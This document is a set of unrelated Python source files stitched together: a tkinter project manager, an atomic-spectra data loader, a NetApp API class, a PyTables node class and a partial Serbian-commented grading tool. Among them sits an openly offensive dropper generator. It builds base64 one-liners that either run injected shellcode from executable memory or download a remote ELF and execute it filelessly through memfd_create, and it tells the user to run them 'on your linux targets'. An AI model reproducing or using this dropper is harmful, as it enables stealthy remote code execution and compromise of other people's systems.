if __name__ == "__main__":
base = DuccBase()
|
<filename>src/main.py<gh_stars>1-10
from tkinter import filedialog , Button, W, E, Label, Tk, messagebox
from informationgetter import InformationGetter
from pathgetter import getprojectspath, getprojectspath_window, filepath_status
from datetime import datetime
import tzlocal
import json
# window creation
root = Tk()
root.title("ProjectManager")
root.configure(background="#1abc9c")
# needed global variables
rownum = 1
local_timezone = tzlocal.get_localzone()
folder_id = 0
label_dict = {}
label_list = []
def change_status(folder_id):
print("change status func")
to_dump = infoget.load_statuses()
folder_list = infoget.returnlist()
if to_dump[folder_list[folder_id]] == "In progress":
to_dump[folder_list[folder_id]] = "Done"
else:
to_dump[folder_list[folder_id]] = "In progress"
json.dump(to_dump, open(filepath_status, "w"), indent = 4)
label_list[folder_id].configure(text = to_dump[folder_list[folder_id]])
label_list[folder_id].update()
if getprojectspath() == "":
projectpath = getprojectspath_window()
else:
projectpath = getprojectspath()
infoget = InformationGetter(projectpath)
title = Label(text = "ProjectManager", font = ('Comic Sans MS', 15))
title.configure(background = "#1abc9c")
title.grid(row = 0, column = 0, columnspan = 2)
version = Label(text = "v1.1.1", font = ('Comic Sans MS', 15))
version.configure(background = "#1abc9c")
version.grid(row = 0, column = 3, sticky = E)
last_change_time = []
for time in infoget.get_last_change_time():
last_change_time.append(datetime.fromtimestamp(time, local_timezone).strftime('%Y-%m-%d %H:%M:%S'))
while folder_id < len(infoget.returnlist()):
folder = infoget.returnlist()[folder_id]
# folder title
l = Label(text = folder)
l.configure(background = "#1abc9c", font = ("Comic Sans MS", 13))
l.grid(row = rownum, column = 0, sticky = W)
# last change time
changetime = Label(text = last_change_time[folder_id])
changetime.configure(background = "#1abc9c", font = ("Comic Sans MS", 13))
changetime.grid(row = rownum, column = 1, sticky = E, padx = 30)
# status
status = Label(text = infoget.load_statuses()[folder])
status.configure(background = "#1abc9c", font = ("Comic Sans MS", 13))
status.grid(row = rownum, column = 2, sticky = E, padx = 30)
label_dict[folder] = status
label_list.append(status)
change_status_button = Button(text = "Change Status", command = lambda folder_id=folder_id: change_status(folder_id))
change_status_button.configure(background = "#3498db")
change_status_button.grid(row = rownum, column = 3)
rownum += 1
folder_id += 1
choose_path_button = Button(text = "Choose your 'projects' folder path", command = getprojectspath_window)
choose_path_button.configure(background = "#3498db")
choose_path_button.grid(row = rownum, column = 0, sticky = W)
madeby = Label(text = "Made by Disoriented Crocodile")
madeby.configure(background = "#1abc9c", font = ("Comic Sans MS", 13))
madeby.grid(row = rownum, column = 2, sticky = E, columnspan = 2)
root.mainloop() |
<filename>read_database.py
import numpy as np
import pandas as pd
import re #get rid of nun numeric strings
def fill_zeros_with_last(arr):
last_val = None # I don't really care about the initial value
for i in range(arr.size):
if arr[i] and arr[i]!='':
last_val = arr[i]
else:
arr[i] = last_val
def load_levels_lines(B_string, second_ce, dist, database, ele_B, charge_state, I_A):
if second_ce:
B_string=ele_sym_B+'I'
I_levels_file="datatables/"+B_string+'cm-1.nist'
I_levels = open(I_levels_file,'rb')
if dist!=0:
if database == 'nist':
I_lines_file="datatables/"+B_string+'linescm-1.nist'
if database == 'kurucz':
I_lines_file="datatables/"+B_string+'Ilinescm-1.kurucz'
try:
I_lines = open(I_lines_file,'rb')
except Exception as e:
print(e)
I_B=ele_B.ionenergies[charge_state]
if I_A == I_B: #resonant charge exchange not treated
I_B=I_B+0.000005
print("I_A:",I_A,"I_B:",I_B)
data = np.genfromtxt(I_levels,delimiter = '|',dtype=str,skip_header=4,autostrip=1)
data=data[np.array([len(entry) > 1 for entry in data.T[3]])]# get rid of length 0 strings i.e. empty energies
atom_config = list(filter(None,data.T[0]))
term = np.array(list(data.T[1]))#n.b. will have whitespace
# term = list(data.T[1])#n.b. will have whitespace
J = [entry.replace("[","").replace("]","").replace(" ","").replace("?","").replace("x","").replace("+","") for entry in list(data.T[2])]
level_raw = [entry.replace("[","").replace("]","").replace(" ","").replace("?","").replace("x","").replace("+","") for entry in list(data.T[3])]
fill_zeros_with_last(term)
if dist!=0:
if "nist" in I_lines_file:
print("loading transitions...")
data = np.genfromtxt(I_lines,delimiter = '|',dtype=str,skip_header=6,autostrip=1)
print("done loading")
# print(data)
A_ki = list(filter(None,data.T[3])) #s^-1
# lines = list(filter(None,data.T[5])) #s^-1
lines = [entry.replace("[","").replace("]","").replace(" ","").replace("?","").replace("x","").replace("+","") for entry in list(filter(None,data.T[5]))] # s-1
E_i=[]
E_k=[]
for x in lines:
transition=x.split("-")
E_i.append(float(transition[0]))
E_k_val=transition[1].replace("[","").replace("]","").replace(" ","")
# print(E_k_val)
# E_k_val=re.sub("[^0-9]", "", transition[1])
E_k.append(float(E_k_val))
elif "kurucz" in I_lines_file:
data = np.genfromtxt(I_lines,dtype=str,skip_header=4,autostrip=1) #default delimiter is strings of whitespace
A_ki = list(filter(None,data.T[2])) #s^-1
E_i=[float(i) for i in list(filter(None,data.T[6]))]
E_k=[float(i) for i in list(filter(None,data.T[8]))]
# lines=list(zip(E_i,E_k))
else:
print("not .nist or .kurucz??!")
####fills in the blanks terms and creates Ls and Ss####
def spec_to_L(spec):
spec_dict={"S":0,"P":1,"D":2,"F":3,"G":4,"H":5,"I":6,"K":7,"L":8,"M":9}
for letter in spec:
if letter in spec_dict.keys():
return spec_dict[letter]
else:
print("Spec notation not recognised")
# if spec[0] =='[':
if "[" in spec:
val=spec[spec.index("[") + 1:spec.rindex("]")]
return float(eval(val))
else:
return spec
L, S, level, skipped_level=[], [], [], []
for index, x in enumerate(term):
print("term", x)
# temp_term=x
if x == '':
# if J[index] != '':
# term[index]=temp_term
temp_term="thiswontfloat"
else:
temp_term=x
if ' ' in temp_term: temp_term=temp_term[temp_term.index(' ')+1:] # fixes case e.g. "a 7S*", "c 5G" ...
if J[index] != '':
try:
L_mom=float(spec_to_L(temp_term[1:]))
L.append(L_mom)
# print("level_raw[index]", level_raw[index], len(level_raw[index]))
level.append(level_raw[index])
except Exception as e: #if ang. mom. assignments unknown
print(e)
print("skipping level", temp_term)
if level_raw[index][0] =='[':
val=level_raw[index][level_raw[index].index("[") + 1:level_raw[index].rindex("]")]
skipped_level.append(float(val))
else:
# val=re.sub("[^0-9]", "", level_raw[index])
# skipped_level.append(float(val))
skipped_level.append(float(level_raw[index]))
try:
S.append((int(temp_term[0])-1)/2)
except:
pass
elif level_raw[index] != '':
term[index-1]=temp_term
try:
L_mom=float(spec_to_L(temp_term[1:]))
L.append(L_mom)
level.append(level_raw[index])
except Exception as e: #if ang. mom. assignments unknown
print(e)
print("skipping level", temp_term)
try:
S.append((int(temp_term[0])-1)/2)
except:
pass
#removes leftover blanks
term=list(filter(None,term))
J=list(filter(None,J))
####fills in the blanks terms and creates Ls and Ss####
if dist!=0:
E_k_probs=[]#decay out of
for index_x,x in enumerate(E_k,start=0):
for index_y,y in enumerate(E_k,start=0):
try:
if float(y)==float(x) and not (y in E_k_lines[0]):
E_k_probs.append([x,E_i[index_y],float(A_ki[index_y])])
except: #excepts on first time
if float(y)==float(x):
E_k_probs.append([x,E_i[index_y],float(A_ki[index_y])])
#sum_A_ki.append[x,A_ki[index_y]]
if dist!=0:
return I_B, term, J, L, S, level, skipped_level, E_k_probs
else:
return I_B, term, J, L, S, level, skipped_level
|
#!/usr/bin/env python3
'''
generate a one liner for python based shellcode delivery
'''
# pylint: disable=invalid-name, broad-except
import atexit
import base64
import readline
import sys
sc_loader_template = '''
import ctypes
import sys
from ctypes.util import find_library
PROT_READ = 0x01
PROT_WRITE = 0x02
PROT_EXEC = 0x04
MAP_PRIVATE = 0X02
MAP_ANONYMOUS = 0X20
ENOMEM = -1
SHELLCODE = "{var_0}"
libc = ctypes.CDLL(find_library('c'))
mmap = libc.mmap
mmap.argtypes = [ctypes.c_void_p, ctypes.c_size_t,
ctypes.c_int, ctypes.c_int, ctypes.c_int, ctypes.c_size_t]
mmap.restype = ctypes.c_void_p
page_size = ctypes.pythonapi.getpagesize()
sc_size = len(SHELLCODE)
mem_size = page_size * (1 + sc_size/page_size)
cptr = mmap(0, mem_size, PROT_READ | PROT_WRITE |
PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS,
-1, 0)
if cptr == ENOMEM:
sys.exit("mmap")
if sc_size <= mem_size:
ctypes.memmove(cptr, SHELLCODE, sc_size)
sc = ctypes.CFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p)
call_sc = ctypes.cast(cptr, sc)
call_sc(None)
'''
memfd_exec_loader_template = '''
import ctypes
import urllib2
from ctypes.util import find_library
d = urllib2.urlopen('{var_0}').read()
count = len(d)
# memfd_create
syscall = ctypes.CDLL(None).syscall
syscall.restype = ctypes.c_int
syscall.argtypes = [ctypes.c_long, ctypes.c_char_p, ctypes.c_uint]
fd = syscall(319, '', 0)
# write
syscall.restype = ctypes.c_ssize_t
syscall.argtypes = [ctypes.c_long, ctypes.c_int,
ctypes.c_void_p, ctypes.c_size_t]
res = syscall(1, fd, d, count)
# execve
syscall.restype = ctypes.c_int
syscall.argtypes = [ctypes.c_long, ctypes.c_char_p, ctypes.POINTER(
ctypes.c_char_p), ctypes.POINTER(ctypes.c_char_p)]
str_arr = ctypes.c_char_p * 2
argv = str_arr()
argv[:] = [{var_1}]
res = syscall(59, "/proc/self/fd/"+str(fd), argv, None)
'''
class Dropper:
'''
Generate a shell command dropper using one of the python2 templates
'''
def __init__(self, dropper):
self.dropper = dropper
self.args = []
self.select_dropper()
if self.args is None and '{var_0}' in self.dropper:
print("no args given, the dropper won't work")
i = 0
for var in self.args:
self.dropper = self.dropper.replace('{var_'+str(i)+'}', var)
i += 1
def select_dropper(self):
'''
return the template
'''
if self.dropper == "shellcode":
self.dropper = sc_loader_template
self.config_shellcode_loader()
elif self.dropper == "memfd_exec":
self.dropper = memfd_exec_loader_template
self.config_memfd_exec()
def config_shellcode_loader(self):
'''
shellcode loader code
'''
shellcode = input(
"[?] shellcode hex string (eg. \\x00\\x01): ").strip()
self.args.append(shellcode)
def config_memfd_exec(self):
'''
memfd_exec code
'''
url = input("[?] URL to your ELF binary: ").strip()
self.args.append(url)
argv = input(
"[?] argv array to run your ELF (eg. 'ls', '-lah', '/tmp'): ").strip()
self.args.append(argv)
def gen_cmd(self):
'''
generate the cmd for dropping
'''
payload = base64.b64encode(self.dropper.encode("utf-8"))
print(
f'''echo "exec('{payload.decode('utf-8')}'.decode('base64'))"|python''')
print("\n\nRun this one liner on your linux targets")
# usage
try:
dropper_selection = sys.argv[1]
except IndexError:
print(f"{sys.argv[0]} <shellcode/memfd_exec>")
sys.exit(1)
def save(prev_h_len, hfile):
'''
append to histfile
'''
new_h_len = readline.get_current_history_length()
readline.set_history_length(1000)
readline.append_history_file(new_h_len - prev_h_len, hfile)
# support GNU readline interface, command history
histfile = "/tmp/.dropper_gen_history"
try:
readline.read_history_file(histfile)
h_len = readline.get_current_history_length()
except FileNotFoundError:
open(histfile, 'wb').close()
h_len = 0
atexit.register(save, h_len, histfile)
try:
# run
dropper_gen = Dropper(dropper_selection)
dropper_gen.gen_cmd()
except KeyboardInterrupt:
sys.exit(0)
|
<reponame>radekg/netapp-ontap-lib-get
from netapp.igroup.initiator_info import InitiatorInfo
from netapp.netapp_object import NetAppObject
class InitiatorGroupInfo(NetAppObject):
"""
Information about an initiator group.
"""
_initiator_group_alua_enabled = None
@property
def initiator_group_alua_enabled(self):
"""
Boolean value to indicate if this initiator group
has ALUA (Asymmetric Logical Unit Access) features
enabled for luns mapped to this initiator group.
"""
return self._initiator_group_alua_enabled
@initiator_group_alua_enabled.setter
def initiator_group_alua_enabled(self, val):
if val != None:
self.validate('initiator_group_alua_enabled', val)
self._initiator_group_alua_enabled = val
_initiator_group_throttle_borrow = None
@property
def initiator_group_throttle_borrow(self):
"""
Boolean value to indicate that the igroups throttle
reserve may be exceeded if the igroup attempts to use
more than it has reserved.
"""
return self._initiator_group_throttle_borrow
@initiator_group_throttle_borrow.setter
def initiator_group_throttle_borrow(self, val):
if val != None:
self.validate('initiator_group_throttle_borrow', val)
self._initiator_group_throttle_borrow = val
_initiator_group_use_partner = None
@property
def initiator_group_use_partner(self):
"""
Boolean value to indicate if this initiator group
is configured for its luns to require the use of
host multi-pathing software for correct high-availability
failover operation.
In Data ONTAP 7-Mode, this value is optional and
is only returned for FCP initiator groups on an storage
system in an HA pair.
In Data ONTAP Cluster-Mode, this field will always be 'true'.
"""
return self._initiator_group_use_partner
@initiator_group_use_partner.setter
def initiator_group_use_partner(self, val):
if val != None:
self.validate('initiator_group_use_partner', val)
self._initiator_group_use_partner = val
_initiator_group_portset_name = None
@property
def initiator_group_portset_name(self):
"""
Name of the portset that is bound to the initiator
group, if any.
"""
return self._initiator_group_portset_name
@initiator_group_portset_name.setter
def initiator_group_portset_name(self, val):
if val != None:
self.validate('initiator_group_portset_name', val)
self._initiator_group_portset_name = val
_initiator_group_type = None
@property
def initiator_group_type(self):
"""
Type of the initiators in this group.
Possible values: "iscsi", "fcp", "mixed".
"""
return self._initiator_group_type
@initiator_group_type.setter
def initiator_group_type(self, val):
if val != None:
self.validate('initiator_group_type', val)
self._initiator_group_type = val
_initiator_group_vsa_enabled = None
@property
def initiator_group_vsa_enabled(self):
"""
Boolean value to indicate if this initiator group
has Volume Set Addressing (VSA) enabled or disabled.
"""
return self._initiator_group_vsa_enabled
@initiator_group_vsa_enabled.setter
def initiator_group_vsa_enabled(self, val):
if val != None:
self.validate('initiator_group_vsa_enabled', val)
self._initiator_group_vsa_enabled = val
_vserver = None
@property
def vserver(self):
"""
Name of the vserver hosting this initiator group
"""
return self._vserver
@vserver.setter
def vserver(self, val):
if val != None:
self.validate('vserver', val)
self._vserver = val
_initiator_group_throttle_reserve = None
@property
def initiator_group_throttle_reserve(self):
"""
Percentage of filer SCSI command blocks reserved
for this initiator group's exclusive usage.
"""
return self._initiator_group_throttle_reserve
@initiator_group_throttle_reserve.setter
def initiator_group_throttle_reserve(self, val):
if val != None:
self.validate('initiator_group_throttle_reserve', val)
self._initiator_group_throttle_reserve = val
_initiator_group_os_type = None
@property
def initiator_group_os_type(self):
"""
OS type of the initiator group
"""
return self._initiator_group_os_type
@initiator_group_os_type.setter
def initiator_group_os_type(self, val):
if val != None:
self.validate('initiator_group_os_type', val)
self._initiator_group_os_type = val
_lun_id = None
@property
def lun_id(self):
"""
LUN identifier to which the LUN is mapped at the host.
This value is optional and is only returned for the
lun-map-list-info api.
"""
return self._lun_id
@lun_id.setter
def lun_id(self, val):
if val != None:
self.validate('lun_id', val)
self._lun_id = val
_initiators = None
@property
def initiators(self):
"""
List of initiators belonging to this group.
"""
return self._initiators
@initiators.setter
def initiators(self, val):
if val != None:
self.validate('initiators', val)
self._initiators = val
_initiator_group_name = None
@property
def initiator_group_name(self):
"""
Name of this initiator group.
"""
return self._initiator_group_name
@initiator_group_name.setter
def initiator_group_name(self, val):
if val != None:
self.validate('initiator_group_name', val)
self._initiator_group_name = val
_initiator_group_report_scsi_name_enabled = None
@property
def initiator_group_report_scsi_name_enabled(self):
"""
Boolean value to indicate whether to report or hide
SCSI Name String (8h) Descriptor to initiator's
INQUIRY VPD 0x83 page command. This field is available in
Data ONTAP 8.1.0 and later.
"""
return self._initiator_group_report_scsi_name_enabled
@initiator_group_report_scsi_name_enabled.setter
def initiator_group_report_scsi_name_enabled(self, val):
if val != None:
self.validate('initiator_group_report_scsi_name_enabled', val)
self._initiator_group_report_scsi_name_enabled = val
_initiator_group_uuid = None
@property
def initiator_group_uuid(self):
"""
This value is Universally-unique identifier (UUID) of this
initiator group.
<p>
The UUIDs are formatted as 36-character strings. These
strings are composed of 32 hexadecimal characters
broken up into five groupings separated by '-'s. The
first grouping has 8 hexadecimal characters, the second through
fourth groupings have four hexadecimal characters each, and the
fifth and final grouping has 12 hexadecimal characters. Note
that a leading '0x' is not used.
<p>
This field is available in Data ONTAP 7-mode 7.3.6, 8.0.2, 8.1.0 and later
for the igroup-list-info API.
This field is available in Data ONTAP Cluster-Mode 8.1.0 and later for
the igroup-get-iter and lun-map-list-info APIs.
<p>
Here is an example of an actual UUID:
<p>
<dl>
<dt><dd> 35d6ca90-c759-11df-8b6d-00a098132c6c </dd><br></dt>
</dl>
"""
return self._initiator_group_uuid
@initiator_group_uuid.setter
def initiator_group_uuid(self, val):
if val != None:
self.validate('initiator_group_uuid', val)
self._initiator_group_uuid = val
@staticmethod
def get_api_name():
return "initiator-group-info"
@staticmethod
def get_desired_attrs():
return [
'initiator-group-alua-enabled',
'initiator-group-throttle-borrow',
'initiator-group-use-partner',
'initiator-group-portset-name',
'initiator-group-type',
'initiator-group-vsa-enabled',
'vserver',
'initiator-group-throttle-reserve',
'initiator-group-os-type',
'lun-id',
'initiators',
'initiator-group-name',
'initiator-group-report-scsi-name-enabled',
'initiator-group-uuid',
]
def describe_properties(self):
return {
'initiator_group_alua_enabled': { 'class': bool, 'is_list': False, 'required': 'required' },
'initiator_group_throttle_borrow': { 'class': bool, 'is_list': False, 'required': 'required' },
'initiator_group_use_partner': { 'class': bool, 'is_list': False, 'required': 'optional' },
'initiator_group_portset_name': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'initiator_group_type': { 'class': basestring, 'is_list': False, 'required': 'required' },
'initiator_group_vsa_enabled': { 'class': bool, 'is_list': False, 'required': 'required' },
'vserver': { 'class': basestring, 'is_list': False, 'required': 'optional' },
'initiator_group_throttle_reserve': { 'class': int, 'is_list': False, 'required': 'required' },
'initiator_group_os_type': { 'class': basestring, 'is_list': False, 'required': 'required' },
'lun_id': { 'class': int, 'is_list': False, 'required': 'optional' },
'initiators': { 'class': InitiatorInfo, 'is_list': True, 'required': 'optional' },
'initiator_group_name': { 'class': basestring, 'is_list': False, 'required': 'required' },
'initiator_group_report_scsi_name_enabled': { 'class': bool, 'is_list': False, 'required': 'optional' },
'initiator_group_uuid': { 'class': basestring, 'is_list': False, 'required': 'optional' },
}
|
########################################################################
#
# License: BSD
# Created: January 14, 2004
# Author: <NAME> - <EMAIL>
#
# $Id$
#
########################################################################
"""Here is defined the UnImplemented class.
See UnImplemented class docstring for more info.
Classes:
UnImplemented
Misc variables:
__version__
"""
import warnings
import numpy
from tables import hdf5Extension
from tables.utils import SizeType, lazyattr
from tables.node import Node
from tables.leaf import Leaf
from tables.attributeset import AttributeSet
__version__ = "$Revision$"
class UnImplemented(hdf5Extension.UnImplemented, Leaf):
"""
This class represents datasets not supported by PyTables in an
HDF5 file.
When reading a generic HDF5 file (i.e. one that has not been
created with PyTables, but with some other HDF5 library based
tool), chances are that the specific combination of datatypes or
dataspaces in some dataset might not be supported by PyTables yet.
In such a case, this dataset will be mapped into an
`UnImplemented` instance and the user will still be able to access
the complete object tree of the generic HDF5 file. The user will
also be able to *read and write the attributes* of the dataset,
*access some of its metadata*, and perform *certain hierarchy
manipulation operations* like deleting or moving (but not copying)
the node. Of course, the user will not be able to read the actual
data on it.
This is an elegant way to allow users to work with generic HDF5
files despite the fact that some of its datasets are not supported
by PyTables. However, if you are really interested in having full
access to an unimplemented dataset, please get in contact with the
developer team.
This class does not have any public instance variables or methods,
except those inherited from the `Leaf` class.
"""
# Class identifier.
_c_classId = 'UNIMPLEMENTED'
def __init__(self, parentNode, name):
"""Create the `UnImplemented` instance."""
# UnImplemented objects always come from opening an existing node
# (they can not be created).
self._v_new = False
"""Is this the first time the node has been created?"""
self.nrows = SizeType(0)
"""The length of the first dimension of the data."""
self.shape = (SizeType(0),)
"""The shape of the stored data."""
self.byteorder = None
"""
The endianness of data in memory ('big', 'little' or
'irrelevant').
"""
super(UnImplemented, self).__init__(parentNode, name)
def _g_open(self):
(self.shape, self.byteorder, objectID) = \
self._openUnImplemented()
self.nrows = SizeType(self.shape[0])
return objectID
def _g_copy(self, newParent, newName, recursive, _log=True, **kwargs):
"""
Do nothing.
This method does nothing, but a ``UserWarning`` is issued.
Please note that this method *does not return a new node*, but
``None``.
"""
warnings.warn(
"UnImplemented node %r does not know how to copy itself; skipping"
% (self._v_pathname,))
return None # Can you see it?
def _f_copy(self, newparent=None, newname=None,
overwrite=False, recursive=False, createparents=False,
**kwargs):
"""
Do nothing.
This method does nothing, since `UnImplemented` nodes can not
be copied. However, a ``UserWarning`` is issued. Please note
that this method *does not return a new node*, but ``None``.
"""
# This also does nothing but warn.
self._g_copy(newparent, newname, recursive, **kwargs)
return None # Can you see it?
def __repr__(self):
return """%s
NOTE: <The UnImplemented object represents a PyTables unimplemented
dataset present in the '%s' HDF5 file. If you want to see this
kind of HDF5 dataset implemented in PyTables, please contact the
developers.>
""" % (str(self), self._v_file.filename)
# Classes reported as H5G_UNKNOWN by HDF5
class Unknown(Node):
"""
This class represents nodes reported as ``unknown`` by the
underlying HDF5 library.
This class does not have any public instance variables or methods,
except those inherited from the `Node` class.
"""
# Class identifier
_c_classId = 'UNKNOWN'
def __init__(self, parentNode, name):
"""Create the `Unknown` instance."""
self._v_new = False
super(Unknown, self).__init__(parentNode, name)
def _g_new(self, parentNode, name, init=False):
pass
def _g_open(self):
return 0
def _g_copy(self, newParent, newName, recursive, _log=True, **kwargs):
# Silently avoid doing copies of unknown nodes
return None
def _g_delete(self, parent):
pass
def __str__(self):
pathname = self._v_pathname
classname = self.__class__.__name__
return "%s (%s)" % (pathname, classname)
def __repr__(self):
return """%s
NOTE: <The Unknown object represents a node which is reported as
unknown by the underlying HDF5 library, but that might be
supported in more recent HDF5 versions.>
""" % (str(self))
# These are listed here for backward compatibility with PyTables 0.9.x indexes
class OldIndexArray(UnImplemented):
_c_classId = 'IndexArray'
|
<reponame>mgornik/PEAN<gh_stars>0
# -*- coding: utf-8 -*-
import logging
import util
import os
import os.path as path
import re
import final_report
import datetime
import sys
import fnmatch
from util import bcolors
from os.path import join
from Queue import Queue
from shutil import copyfile
from threading import Thread
from testing_results import TestResults
from assignment_status import *
def execute_build_command(backend, config, criteria, comp, stations, current_assignment_path, autobuild_path):
"""
Izvršenje komande koja obavlja kompajliranje zadatka
backend - back-end koji se trenutno koristi
config - globalna konfiguracija alata za pregled
criteria - kriterijum pregleda zadatka (bodovanje, način izvršavanja itd.)
comp - oznaka računara na kojem je urađen zadatak koji se pregleda
stations - kolekcija računara i studenata koji su radili zadatak (ključ - oznaka računara, podatak - lista - broj
indeksa i ime/prezime studenta)
current_assignment_path - putanja na kojoj se nalazi studentski zadatak koji se kompajlira
autobuild_path - putanja na kojoj se nalazi autobuild varijanta tekućeg zadatka
"""
logging.info('Pokrenuto je kompajliranje tekuceg projekta u direktorijumu: {0}'.format(current_assignment_path))
build_report_path = join(autobuild_path, backend.get_build_report_filename())
code = internal_build_project(backend, config, criteria, current_assignment_path, autobuild_path)
if code == 0:
print bcolors.OKGREEN + 'Kompajliranje projekta je uspesno.' + bcolors.ENDC
elif code == 1:
print bcolors.FAIL + '''Kompajliranje projekta je generisalo upozorenja!
Mozete nastaviti sa izvrsenjem testova, ukoliko zelite da pregledate izvestaj o kompajliranju, on se nalazi u fajlu: "{0}"'''.format(backend.get_build_report_filename()) + bcolors.ENDC
else:
if vm_build_error(build_report_path):
util.fatal_error('''Kompajliranje projekta je neuspesno.
Razlog neuspeha je cinjenica da je sva virtuelna memorija potrosena.
Najbolje je da restartujete sistem pa potom nastavite pregled.''')
else:
print bcolors.FAIL \
+ 'Kompajliranje projekta je neuspesno. Bice prikazan fajl ("{0}") sa izvestajem kompajliranja.'\
.format(backend.get_build_report_filename()) + bcolors.ENDC
raw_input('Pritisnite <ENTER> za nastavak...')
util.show_text_edit(config, build_report_path)
final_report.update_final_report(config, criteria, stations, comp, datetime.datetime.now().isoformat(),
status=ASSIGNMENT_STATUS_FAILS_TO_COMPILE)
sys.exit(0)
def execute_run_tests_command(backend, config, criteria, stations, run_path, comp):
"""
Izvršenje komande koja obavlja pokretanje svih testova za zadatak
backend - back-end koji se trenutno koristi
config - globalna konfiguracija alata za pregled
criteria - kriterijum pregleda zadatka (bodovanje, način izvršavanja itd.)
stations - kolekcija računara i studenata koji su radili zadatak (ključ - oznaka računara, podatak - lista - broj
indeksa i ime/prezime studenta)
run_path - putanja na kojoj se nalazi studentski zadatak čiji se testovi izvršavaju
comp - oznaka računara na kojem je urađen zadatak koji se pregleda
"""
if not path.isdir(config.AUTOTEST_PATH):
util.fatal_error('''Prilikom postavljanja zadatka nije postavljena autotest varijanta zadatka.\n'
Ako zelite da koristite automatsko testiranje, kreirajte direktorijum "{0}" i postavite autotest varijantu u njega.'''.format(config.AUTOTEST_PATH))
if not path.isdir(run_path):
util.fatal_error('Ne mogu se pokrenuti testovi jer projekat nije prethodno kompajliran.\n'
+ 'Upotrebite komandu build za kompajliranje projekta.')
util.make_sure_path_exists(config.REPORTS_PATH)
current_reports_path = join(config.REPORTS_PATH, comp)
util.make_sure_path_exists(current_reports_path)
util.clear_directory(current_reports_path)
logging.info('Pokrenuti su automatski testovi tekuceg projekta u direktorijumu: {0}'.format(run_path))
proj = util.identify_project_file(backend, run_path)
executable = backend.identify_project_executable(proj)
all_results = []
tests = []
for s in criteria.score_distribution:
tests.append(s.keys()[0])
# Zakazivanje izvršenja testova od strane (potencijalno) više niti za izvršenje testova:
print('Sledeci testovi ce biti izvrseni: {0}'.format(', '.join(tests)))
print('Svaki test se izvrsava {0} put(a)'.format(criteria.runs_spec['total']))
for t in tests:
execution_results[t] = [None] * criteria.runs_spec['total']
for i in range(backend.get_parallel_testing_threads_count()):
t = Thread(target = execution_worker_thread, args = (backend, criteria, i, run_path, executable))
t.daemon = True
t.start()
for t in tests:
test_index = 0
for run in range(1, criteria.runs_spec['total'] + 1):
execution_queue.put([test_index, t, get_console_report_path(config, comp, t, test_index)])
test_index += 1
execution_queue.join()
# Grupisanje dobijenih rezultata - konsolidacija rezultata po svakom pojedinačnom testu (po nazivu testa):
for t in tests:
results = execution_results[t]
# Određivanje najdužeg vremena izvršenja ovog testa:
max_duration = results[0].duration
executions = []
for r in results:
if r.duration > max_duration:
max_duration = r.duration
executions.append(r.result == 'passed')
passes = sum(1 for x in results if x.result == 'passed')
entry = TestResults(name = t,
runs = criteria.runs_spec['total'],
passes = passes,
failures = sum(1 for x in results if x.result != 'passed'),
test_fails = sum(1 for x in results if x.result == 'failed'),
crashes = sum(1 for x in results if x.result == 'crashed'),
time_outs = sum(1 for x in results if x.result == 'timed-out'),
total_duration = sum(x.duration for x in results),
max_duration = max_duration,
score = get_score(criteria, t)["percent"],
factor = get_score(criteria, t)["factor"],
success = (passes / float(criteria.runs_spec['total'])) >= criteria.runs_spec['pass_limit'],
executions = executions)
all_results.append(entry)
# Ispis rezimea pokretanja testova na konzolu:
total = len(criteria.score_distribution)
passed = 0
score = 0
blockers = False
for t in all_results:
print ''
header_line = 'TEST: {0}, ukupno izvrsenja: {1}'.format(t.name, t.runs)
print '*' * len(header_line)
print bcolors.BOLD + header_line + bcolors.ENDC
print '*' * len(header_line)
if t.runs < criteria.runs_spec['total']:
print bcolors.FAIL \
+ 'Detektovano je dovoljno negativnih ishoda pa nije obavljeno svih {0} zahtevanih pokretanja'\
.format(criteria.runs_spec['total']) + bcolors.ENDC
if t.passes > 0:
print bcolors.OKGREEN + 'PROSAO: {0} put(a)'.format(t.passes) + bcolors.ENDC
if t.failures > 0:
print bcolors.FAIL + 'PAO: {0} put(a), od toga:'.format(t.failures) + bcolors.ENDC
if t.test_fails > 0:
print bcolors.FAIL + ' Formirao los rezultat: {0} put(a)'.format(t.test_fails) + bcolors.ENDC
if t.crashes > 0:
print bcolors.FAIL + ' Nasilno prekinuo izvrsenje: {0} put(a)'.format(t.crashes) + bcolors.ENDC
if t.time_outs > 0:
print bcolors.FAIL + ' Prekoracio dozvoljeno vreme: {0} put(a)'.format(t.time_outs) + bcolors.ENDC
print 'Ukupno vreme izvrsenja: {0}, najduze pokretanje: {1}'.format(t.total_duration, t.max_duration)
if t.success:
print bcolors.OKGREEN + 'Test se smatra uspesnim, tezina: {0} (od ukupno {1}), procentualno: {2:.2f}%'\
.format(t.factor, criteria.total_weight, t.score) + bcolors.ENDC
passed += 1
score += t.score
else:
print bcolors.FAIL + 'Test se smatra neuspesnim' + bcolors.ENDC
if t in criteria.blocking_tests:
blockers = True
print bcolors.FAIL + 'Ovo je blokirajuci test!' + bcolors.ENDC
print ''
if passed == total:
print bcolors.OKGREEN \
+ '''Uspesno su izvrseni svi testovi (ukupno je: {0} testova).\nUkupno ostvareno procenata: {1:.2f}%'''.format(total, score) + bcolors.ENDC
else:
failed = total - passed
print bcolors.FAIL + '''Palo je {0} testova, od ukupno {1}!
Procenat testova koji prolaze: {2:.2f}%, procentualni ucinak: {3:.2f}%'''.format(failed, total, float(passed) / total * 100.0, score) + bcolors.ENDC
status = ASSIGNMENT_STATUS_OK
if blockers:
print bcolors.FAIL + bcolors.BOLD \
+ 'Pao je makar jedan blokirajuci test! U izvestaju je naznaceno da u ovom radu postoje takvi testovi.' \
+ bcolors.ENDC
status = ASSIGNMENT_STATUS_BLOCKED
final_report.update_final_report(config, criteria, stations, comp, datetime.datetime.now().isoformat(),
status=status, results=all_results)
def get_console_report_path(config, comp, test_name, unique_id):
"""
Pomoćna metoda koja vraća putanju do fajla sa konzolnim izlazom testa čiji je naziv dat
Konzolni izlazi se čuvaju na putanji config.REPORTS_PATH, u poddirektorijumu čiji naziv odgovara računaru.
config - globalna konfiguracija alata za pregled
comp - oznaka računara na kojem je urađen zadatak koji se pregleda
test_name - naziv testa čiji se konzolni izlaz ispituje
unique_id - unikatni identifikator testa (jedan test dobija isti unikatni ID i taj se prosleđuje svim metodama koje
se bave izvršenjem testova)
"""
console_report_name = config.CONSOLE_REPORT_FILENAME.format(test_name, unique_id + 1)
return os.path.join(config.REPORTS_PATH, comp, console_report_name)
def get_score(criteria, test_name):
"""
Vraća kriterijum ocenjivanja za zadati test
